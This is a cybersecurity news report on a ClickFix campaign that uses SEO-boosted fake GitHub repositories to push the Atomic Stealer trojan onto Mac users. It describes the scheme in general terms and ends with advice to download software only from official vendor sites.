Warning: Fake Software on GitHub Is Targeting Mac Users

Cybercriminals have launched a large-scale campaign against macOS users, disguising malware as popular applications. The alert comes from LastPass, which reported that its own product was among those impersonated. Distribution is carried out through fake GitHub repositories deliberately optimized for search engines, allowing them to rank prominently in Google and Bing results.

The attack leverages the ClickFix scheme: victims are instructed to paste a command into the terminal, ostensibly to install the application. In reality, it executes a curl request to an encrypted URL, downloading an install.sh script into the /tmp directory. This script installs the Atomic Stealer (AMOS) trojan. AMOS is a Malware-as-a-Service (MaaS) tool, rented for $1,000 per month, whose core function is stealing data from infected devices. Recently, its developers added a backdoor mechanism, enabling stealthy and persistent access to compromised systems.

According to LastPass, attackers are not limiting themselves to a single brand. The list of impersonated programs exceeds 100, including well-known solutions such as 1Password, Dropbox, Confluence, Robinhood, Fidelity, Notion, Gemini, Audacity, Adobe After Effects, Thunderbird, and SentinelOne. To evade takedowns, fraudsters create numerous fake GitHub accounts and duplicate repositories, each featuring a “Download” button that redirects to a secondary website hosting the terminal command instructions.

Such tactics against macOS are not entirely new. Past incidents included fake Booking.com apps and bogus “system repair” tools distributed via online ads. However, the current campaign is significantly broader in scope: automation enables criminals to swiftly launch new pages after old ones are blocked.

LastPass emphasized that it is actively monitoring the situation and submitting takedown requests to GitHub, though the threat persists due to the ease of generating new repositories.

Security experts stress that users should only trust official developer websites. If a macOS version of a product is not offered by its vendor, any so-called “alternative” is almost certainly malicious. Even when legitimate macOS software exists, it is crucial to ensure that downloads originate from verified sources, not obscure third-party sites.

Support Our Threat Intelligence

If you find our technology report and cybersecurity news helpful, consider supporting our work.

Buy Me a Coffee PayPal Crypto

USDT (TRC20):

TN8BdV8cp4T1Cd28gK9qTAnZknzzuwyUtm Copy

USDT (ERC20):

0x3725e1a7d3bc5765499fa6aaafe307fabcd75bce Copy